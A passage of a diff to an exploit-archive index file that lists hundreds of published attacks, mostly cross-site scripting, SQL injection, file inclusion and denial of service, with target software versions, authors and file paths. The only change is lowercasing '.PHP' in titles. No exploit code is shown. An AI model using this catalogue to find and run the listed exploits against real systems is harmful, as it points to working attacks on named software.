3.0/3.1 FTP_index.php Cross-Site Scripting Vulnerability",2006-06-14,kr4ch,php,webapps,0 +28024,platforms/php/webapps/28024.txt,"PhpBB BBRSS.php Remote File Include Vulnerability",2006-06-14,SpC-x,php,webapps,0 +28025,platforms/php/webapps/28025.txt,"RahnemaCo Page.php Remote File Include Vulnerability",2006-06-14,Breeeeh,php,webapps,0 28026,platforms/linux/dos/28026.txt,"MySQL Server 4/5 Str_To_Date Remote Denial of Service Vulnerability",2006-06-14,Kanatoko,linux,dos,0 28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Include Vulnerabilities",2006-06-14,"Federico Fazzi",php,webapps,0 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 28060,platforms/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,php,webapps,0 28059,platforms/php/webapps/28059.txt,"SAPHPLesson 1.1/2.0/3.0 - Multiple SQL Injection Vulnerabilities",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 LoginProxy.CGI Cross-Site Scripting Vulnerability",2006-06-15,"Thomas Liam Romanis",unix,remote,0 -28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 Login1.PHP Cross-Site Scripting Vulnerability",2006-06-15,"Federico Fazzi",php,webapps,0 +28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 Login1.php Cross-Site Scripting Vulnerability",2006-06-15,"Federico Fazzi",php,webapps,0 28032,platforms/php/webapps/28032.txt,"MPCS 0.2 Comment.php Cross-Site Scripting Vulnerability",2006-03-06,Luny,php,webapps,0 28033,platforms/php/webapps/28033.txt,"VBZoom 1.11 Forum.php SQL Injection Vulnerability",2006-06-15,CrAsh_oVeR_rIdE,php,webapps,0 28034,platforms/php/webapps/28034.txt,"Ji-takz Remote File Include Vulnerability",2006-06-16,SpC-x,php,webapps,0 @@ -25123,7 +25123,7 @@ id,file,description,date,author,platform,type,port 28042,platforms/php/webapps/28042.txt,"dotWidget for articles 2.0 admin/articles.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28043,platforms/php/webapps/28043.txt,"dotWidget for articles 2.0 admin/index.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28045,platforms/php/webapps/28045.txt,"dotWidget for articles 2.0 admin/categories.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - Search.PHP Cross-Site Scripting Vulnerability",2006-06-19,securityconnection,php,webapps,0 +28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - Search.php Cross-Site Scripting Vulnerability",2006-06-19,securityconnection,php,webapps,0 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 index.php Cross-Site Scripting Vulnerability",2006-03-06,alijsb,php,webapps,0 28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 Malformed VMX File Denial of Service Vulnerability",2006-06-19,n00b,multiple,dos,0 28066,platforms/php/webapps/28066.txt,"singapore 0.9.x/0.10 - Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 @@ -25136,7 +25136,7 @@ id,file,description,date,author,platform,type,port 28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - profileview.php membername Parameter XSS",2006-06-20,Luny,php,webapps,0 28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - expire.php cust_name Parameter XSS",2006-06-20,Luny,php,webapps,0 28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 -28076,platforms/php/webapps/28076.txt,"Vbulletin 3.0.9/3.5.x Member.PHP Cross-Site Scripting Vulnerability",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 +28076,platforms/php/webapps/28076.txt,"Vbulletin 3.0.9/3.5.x Member.php Cross-Site Scripting Vulnerability",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28077,platforms/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x Parse_User_ID Remote Buffer Overflow Vulnerability",2006-06-20,"Evgeny Legerov",linux,dos,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 Subject field HTML Injection Vulnerability",2006-06-21,"EllipSiS Security",php,webapps,0 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 @@ -25151,7 +25151,7 @@ id,file,description,date,author,platform,type,port 28089,platforms/php/webapps/28089.txt,"Woltlab Burning Board 1.2/2.0/2.3 newthread.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 -28092,platforms/php/webapps/28092.txt,"MyBulletinBoard 1.0.x/1.1.x Usercp.PHP SQL Injection Vulnerability",2006-06-22,imei,php,webapps,0 +28092,platforms/php/webapps/28092.txt,"MyBulletinBoard 1.0.x/1.1.x Usercp.php SQL Injection Vulnerability",2006-06-22,imei,php,webapps,0 28093,platforms/php/webapps/28093.txt,"SoftBiz Dating Script 1.0 featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28094,platforms/php/webapps/28094.txt,"SoftBiz Dating Script 1.0 products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28095,platforms/php/webapps/28095.txt,"SoftBiz Dating Script 1.0 index.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 @@ -25161,45 +25161,45 @@ id,file,description,date,author,platform,type,port 28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 jscript.dll Non-Ascii Character DoS",2006-06-23,"Ivan Ivan",windows,dos,0 28100,platforms/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - (.cfm) Denial of Service Vulnerability",2006-06-23,"Tan Chew Keong",cfm,dos,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 -28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 Thumb.PHP Cross-Site Scripting Vulnerability",2006-06-24,Luny,php,webapps,0 +28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 Thumb.php Cross-Site Scripting Vulnerability",2006-06-24,Luny,php,webapps,0 28103,platforms/windows/dos/28103.pl,"MailEnable 1.x SMTP HELO Command Remote Denial of Service Vulnerability",2006-06-24,db0,windows,dos,0 -28104,platforms/php/webapps/28104.txt,"ADOdb 4.6/4.7 Tmssql.PHP Cross-Site Scripting Vulnerability",2006-06-26,"Rodrigo Silva",php,webapps,0 -28105,platforms/php/webapps/28105.txt,"eNpaper1 Root_Header.PHP Remote File Include Vulnerability",2006-06-26,almaster,php,webapps,0 +28104,platforms/php/webapps/28104.txt,"ADOdb 4.6/4.7 Tmssql.php Cross-Site Scripting Vulnerability",2006-06-26,"Rodrigo Silva",php,webapps,0 +28105,platforms/php/webapps/28105.txt,"eNpaper1 Root_Header.php Remote File Include Vulnerability",2006-06-26,almaster,php,webapps,0 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Include Vulnerabilities",2006-06-16,Kw3[R]Ln,php,webapps,0 28107,platforms/php/webapps/28107.txt,"Cpanel 10 Select.HTML Cross-Site Scripting Vulnerability",2006-06-26,preth00nker,php,webapps,0 -28108,platforms/php/webapps/28108.txt,"MyMail 1.0 Login.PHP Cross-Site Scripting Vulnerability",2006-06-26,botan,php,webapps,0 -28109,platforms/php/webapps/28109.txt,"Usenet 0.5 Index.PHP Cross-Site Scripting Vulnerability",2006-06-23,Luny,php,webapps,0 +28108,platforms/php/webapps/28108.txt,"MyMail 1.0 Login.php Cross-Site Scripting Vulnerability",2006-06-26,botan,php,webapps,0 +28109,platforms/php/webapps/28109.txt,"Usenet 0.5 Index.php Cross-Site Scripting Vulnerability",2006-06-23,Luny,php,webapps,0 28110,platforms/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting Vulnerability",2006-06-26,r0t,php,webapps,0 28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 header.php title Parameter XSS",2006-06-26,simo64,php,webapps,0 28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 view.php offset Parameter SQL Injection",2006-06-26,simo64,php,webapps,0 28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 OnMouseover Cross-Site Scripting Vulnerability",2006-06-27,MexHackTeam.org,php,webapps,0 -28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 Cookbook.PHP Remote File Include Vulnerability",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 -28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 Admin.PHP Cross-Site Scripting Vulnerability",2006-06-27,botan,php,webapps,0 +28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 Cookbook.php Remote File Include Vulnerability",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 +28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 Admin.php Cross-Site Scripting Vulnerability",2006-06-27,botan,php,webapps,0 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 -28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 Admin.PHP Remote File Include Vulnerability",2006-06-27,botan,php,webapps,0 +28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 Admin.php Remote File Include Vulnerability",2006-06-27,botan,php,webapps,0 28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 OuterHTML Redirection Handling Information Disclosure Vulnerability",2006-06-27,"Plebo Aesdi Nael",windows,remote,0 28119,platforms/php/webapps/28119.txt,"vCard PRO - gbrowse.php cat_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28120,platforms/php/webapps/28120.txt,"vCard PRO - rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28121,platforms/php/webapps/28121.txt,"vCard PRO - create.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28122,platforms/php/webapps/28122.txt,"vCard PRO - search.php event_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28123,platforms/php/webapps/28123.txt,"Pre Shopping Mall 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 -28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 Index.PHP Directory Traversal Vulnerability",2006-06-28,rUnViRuS,php,webapps,0 +28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 Index.php Directory Traversal Vulnerability",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon (video.php value param) - SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Auth Bypass SQL Injection",2013-09-06,shiZheni,php,webapps,0 28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",2013-09-06,metasploit,windows,local,0 -28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 Index.PHP Cross-Site Scripting Vulnerability",2006-06-29,"Kurdish Security",php,webapps,0 +28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 Index.php Cross-Site Scripting Vulnerability",2006-06-29,"Kurdish Security",php,webapps,0 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO index.php Multiple Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO index.php Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO inc/rss_feed.php category Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 28135,platforms/osx/dos/28135.pl,"Apple Mac OS X 10.4.x OpenLDAP Denial of Service Vulnerability",2006-06-27,"Mu Security research",osx,dos,0 -28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.PHP SQL Injection Vulnerability",2006-06-23,DarkFig,php,webapps,0 +28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.php SQL Injection Vulnerability",2006-06-23,DarkFig,php,webapps,0 28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 insertmember.php city Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 lostpassword.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 gen_confirm_mem.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 index.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 -28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX Top.PHP Remote File Include Vulnerability",2006-06-01,MazaGi,php,webapps,0 -28142,platforms/php/webapps/28142.txt,"Diesel Joke Site Category.PHP SQL Injection Vulnerability",2006-07-01,black-code,php,webapps,0 +28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX Top.php Remote File Include Vulnerability",2006-06-01,MazaGi,php,webapps,0 +28142,platforms/php/webapps/28142.txt,"Diesel Joke Site Category.php SQL Injection Vulnerability",2006-07-01,black-code,php,webapps,0 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload Arbitrary File Upload Vulnerability",2006-07-01,"Jihad BENABRA",php,webapps,0 28144,platforms/windows/dos/28144.txt,"Microsoft Internet Explorer 6.0 OutlookExpress.AddressBook Denial of Service Vulnerability",2006-07-01,hdm,windows,dos,0 28145,platforms/windows/dos/28145.html,"Microsoft Internet Explorer 6.0 ADODB.Recordset Filter Property Denial of Service Vulnerability",2006-07-03,hdm,windows,dos,0 @@ -25218,14 +25218,14 @@ id,file,description,date,author,platform,type,port 28158,platforms/php/webapps/28158.txt,"QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",php,webapps,0 28159,platforms/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Include Vulnerability",2006-07-03,"CrAzY CrAcKeR",php,webapps,0 28160,platforms/linux/dos/28160.txt,"Gentoo-Specific MPG123 - URI Remote Buffer Overflow Vulnerability",2006-07-03,"Horst Schirmeier",linux,dos,0 -28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x Comments.PHP Cross-Site Scripting Vulnerability",2006-07-04,iss4m,php,webapps,0 -28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 Index.PHP Remote File Include Vulnerability",2006-07-04,black-code,php,webapps,0 +28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x Comments.php Cross-Site Scripting Vulnerability",2006-07-04,iss4m,php,webapps,0 +28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 Index.php Remote File Include Vulnerability",2006-07-04,black-code,php,webapps,0 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 28164,platforms/windows/dos/28164.html,"Microsoft Internet Explorer 6.0 Href Title Denial of Service Vulnerability",2006-07-04,jsz,windows,dos,0 28165,platforms/osx/dos/28165.html,"Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode() Null Dereference Denial of Service Vulnerability",2006-07-05,"Dennis Cox",osx,dos,0 -28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 Index.PHP Date Parameter SQL Injection Vulnerability",2006-07-05,"Alejandro Ramos",php,webapps,0 +28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 Index.php Date Parameter SQL Injection Vulnerability",2006-07-05,"Alejandro Ramos",php,webapps,0 28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injection Vulnerabilities",2006-07-05,"CrAzY CrAcKeR",php,webapps,0 -28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 Thumb.PHP Remote File Include Vulnerability",2006-07-05,"EllipSiS Security",php,webapps,0 +28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 Thumb.php Remote File Include Vulnerability",2006-07-05,"EllipSiS Security",php,webapps,0 28169,platforms/windows/dos/28169.html,"Microsoft Internet Explorer 5.0.1/6.0 Structured Graphics Control Denial of Service Vulnerability",2006-07-06,hdm,windows,dos,0 28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 PASS Command SEH Overflow (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 28171,platforms/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps,0 @@ -25251,18 +25251,18 @@ id,file,description,date,author,platform,type,port 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 28193,platforms/asp/webapps/28193.txt,"Webvizyon SayfalaAltList.ASP SQL Injection Vulnerability",2006-07-08,StorMBoY,asp,webapps,0 28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 RDS.DataControl Denial of Service Vulnerability",2006-07-08,hdm,windows,dos,0 -28195,platforms/php/webapps/28195.txt,"RW::Download Stats.PHP Remote File Include Vulnerability",2006-07-08,StorMBoY,php,webapps,0 +28195,platforms/php/webapps/28195.txt,"RW::Download Stats.php Remote File Include Vulnerability",2006-07-08,StorMBoY,php,webapps,0 28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6.0 DirectAnimation.DAUserData Denial of Service Vulnerability",2006-07-08,hdm,windows,dos,0 28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6.0 Object.Microsoft.DXTFilter Denial of Service Vulnerability",2006-07-09,hdm,windows,dos,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 Property Code Execution Vulnerability",2006-07-11,anonymous,windows,remote,0 28199,platforms/php/webapps/28199.txt,"PHPBB 1.2.4 For Mambo Multiple Remote File Include Vulnerabilities",2006-07-09,h4ntu,php,webapps,0 -28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 Tiny_mce_gzip.PHP Directory Traversal Vulnerability",2006-07-10,armin390,php,webapps,0 -28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 Topics.PHP SQL Injection Vulnerability",2006-07-10,Paisterist,php,webapps,0 +28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 Tiny_mce_gzip.php Directory Traversal Vulnerability",2006-07-10,armin390,php,webapps,0 +28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 Topics.php SQL Injection Vulnerability",2006-07-10,Paisterist,php,webapps,0 28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6.0 HtmlDlgSafeHelper Remote Denial of Service Vulnerability",2006-07-10,hdm,windows,dos,0 28203,platforms/asp/webapps/28203.txt,"Hosting Controller 1.x Error.ASP Cross-Site Scripting Vulnerability",2006-07-11,Dea7h,asp,webapps,0 -28204,platforms/php/webapps/28204.txt,"SaPHPLesson 2.0 Add.PHP SQL Injection Vulnerability",2006-07-11,C.B.B.L,php,webapps,0 +28204,platforms/php/webapps/28204.txt,"SaPHPLesson 2.0 Add.php SQL Injection Vulnerability",2006-07-11,C.B.B.L,php,webapps,0 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera Cross-Site Scripting Vulnerability",2006-06-11,"Jaime Blasco",php,webapps,0 -28206,platforms/php/webapps/28206.txt,"Fantastic GuestBook 2.0.1 GuestBook.PHP HTML Injection Vulnerabilities",2006-07-11,omnipresent,php,webapps,0 +28206,platforms/php/webapps/28206.txt,"Fantastic GuestBook 2.0.1 GuestBook.php HTML Injection Vulnerabilities",2006-07-11,omnipresent,php,webapps,0 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6.0 TriEditDocument Denial of Service Vulnerability",2006-07-11,hdm,windows,dos,0 28208,platforms/asp/webapps/28208.txt,"FlexWatch 3.0 AIndex.ASP Authorization Bypass Vulnerability",2006-07-12,"Jaime Blasco",asp,webapps,0 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 player.php url Parameter XSS",2006-07-12,xzerox,multiple,remote,0 @@ -25271,9 +25271,9 @@ id,file,description,date,author,platform,type,port 28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 picture.php img Parameter XSS",2006-07-12,simo64,php,webapps,0 28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6.0 RevealTrans Denial of Service Vulnerability",2006-07-12,hdm,windows,dos,0 28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 PhotoCycle.php Parameter Cross-Site Scripting Vulnerability",2006-07-13,Luny,php,webapps,0 -28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 Calendar.PHP Remote File Include Vulnerability",2006-07-13,Solpot,php,webapps,0 +28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 Calendar.php Remote File Include Vulnerability",2006-07-13,Solpot,php,webapps,0 28216,platforms/php/webapps/28216.txt,"FlatNuke 2.5.7 Index.php Remote File Include Vulnerability",2006-07-13,rgod,php,webapps,0 -28217,platforms/php/webapps/28217.txt,"Forum 5 PM.PHP Local File Include Vulnerability",2006-07-13,rgod,php,webapps,0 +28217,platforms/php/webapps/28217.txt,"Forum 5 PM.php Local File Include Vulnerability",2006-07-13,rgod,php,webapps,0 28218,platforms/php/webapps/28218.txt,"Koobi Pro 5.6 showtopic Module toid Parameter XSS",2006-07-13,"Evampire chiristof",php,webapps,0 28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x ReplaceChild Denial of Service Vulnerability",2006-07-14,hdm,linux,dos,0 @@ -25288,7 +25288,7 @@ id,file,description,date,author,platform,type,port 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers UPNP Buffer Overflow Vulnerability",2006-07-17,"Barnaby Jack",hardware,dos,0 28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 LM_Path Parameter Remote File Include Vulnerability",2006-07-17,xoron,php,webapps,0 28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 FiltNT.SYS Local Denial of Service Vulnerability",2006-07-17,"Bipin Gautam",windows,dos,0 -28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo Com_Calendar.PHP Remote File Include Vulnerability",2006-07-17,Matdhule,php,webapps,0 +28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo Com_Calendar.php Remote File Include Vulnerability",2006-07-17,Matdhule,php,webapps,0 28234,platforms/linux/dos/28234.txt,"MySQL 4.x/5.x Server Date_Format Denial of Service Vulnerability",2006-07-18,"Christian Hammers",linux,dos,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x LHA Filename Handling Buffer Overflow Vulnerability",2006-07-18,"Ryan Smith",windows,remote,0 28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0 @@ -25300,15 +25300,15 @@ id,file,description,date,author,platform,type,port 28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability",2006-07-19,hdm,windows,dos,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss Command Execution Vulnerability",2006-07-19,"Jon Hart",hardware,remote,0 28246,platforms/windows/dos/28246.txt,"Microsoft Internet Explorer 6.0 OVCtl Denial of Service Vulnerability",2006-07-19,hdm,windows,dos,0 -28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 Index.PHP Remote File Include Vulnerability",2006-07-20,r0t,php,webapps,0 -28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 Index.PHP Remote File Include Vulnerability",2006-07-20,r0t,php,webapps,0 +28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 Index.php Remote File Include Vulnerability",2006-07-20,r0t,php,webapps,0 +28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 Index.php Remote File Include Vulnerability",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise index.php d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.PHP Remote File Include Vulnerability",2006-07-20,AG-Spider,php,webapps,0 +28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.php Remote File Include Vulnerability",2006-07-20,AG-Spider,php,webapps,0 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service Vulnerability",2006-07-20,hdm,windows,dos,0 -28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.PHP Remote File Include Vulnerability",2006-07-21,Solpot,php,webapps,0 +28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.php Remote File Include Vulnerability",2006-07-21,Solpot,php,webapps,0 28254,platforms/multiple/remote/28254.txt,"Apache Tomcat 5 Information Disclosure Vulnerability",2006-07-21,"ScanAlert Security",multiple,remote,0 -28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 Index.PHP Directory Traversal Vulnerability",2006-07-21,kicktd,php,webapps,0 +28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 Index.php Directory Traversal Vulnerability",2006-07-21,kicktd,php,webapps,0 28256,platforms/windows/dos/28256.html,"Microsoft Internet Explorer 6.0 Internet.HHCtrl Click Denial of Service Vulnerability",2006-07-22,"Alex F",windows,dos,0 28257,platforms/linux/dos/28257.txt,"GnuPG 1.4/1.9 Parse_Comment Remote Buffer Overflow Vulnerability",2006-07-22,"Evgeny Legerov",linux,dos,0 28258,platforms/windows/dos/28258.txt,"Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service Vulnerability",2006-07-23,hdm,windows,dos,0 @@ -25317,7 +25317,7 @@ id,file,description,date,author,platform,type,port 28261,platforms/php/webapps/28261.txt,"RadScripts a_editpage.php filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 Page Parameter SQL Injection Vulnerability",2006-07-24,"EllipSiS Security",php,webapps,0 28263,platforms/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 - Remote Denial of Service Vulnerability",2006-07-24,"J. Oquendo",windows,dos,0 -28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 Include.PCchess.PHP Remote File Include Vulnerability",2006-07-24,OLiBekaS,php,webapps,0 +28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 Include.PCchess.php Remote File Include Vulnerability",2006-07-24,OLiBekaS,php,webapps,0 28265,platforms/windows/dos/28265.txt,"Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service Vulnerability",2006-07-24,hdm,windows,dos,0 28266,platforms/windows/dos/28266.txt,"AGEphone 1.28/1.38 SIP Packet Handling Buffer Overflow Vulnerability",2006-07-24,"Tan Chew Keong",windows,dos,0 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 @@ -25332,48 +25332,48 @@ id,file,description,date,author,platform,type,port 28277,platforms/multiple/dos/28277.txt,"Opera Web Browser 9 CSS Background URI Memory Corruption Vulnerability",2006-07-25,hdm,multiple,dos,0 28278,platforms/jsp/webapps/28278.txt,"OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities",2006-07-26,"Meder Kydyraliev",jsp,webapps,0 28279,platforms/hardware/webapps/28279.txt,"Router ONO Hitron CDE-30364 - CSRF Vulnerability",2013-09-14,"Matias Mingorance Svensson",hardware,webapps,0 -28280,platforms/php/webapps/28280.txt,"wwwThreads Calendar.PHP Cross-Site Scripting Vulnerability",2006-07-26,l2odon,php,webapps,0 +28280,platforms/php/webapps/28280.txt,"wwwThreads Calendar.php Cross-Site Scripting Vulnerability",2006-07-26,l2odon,php,webapps,0 28281,platforms/php/webapps/28281.txt,"phpbb-auction 1.x auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 -28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - 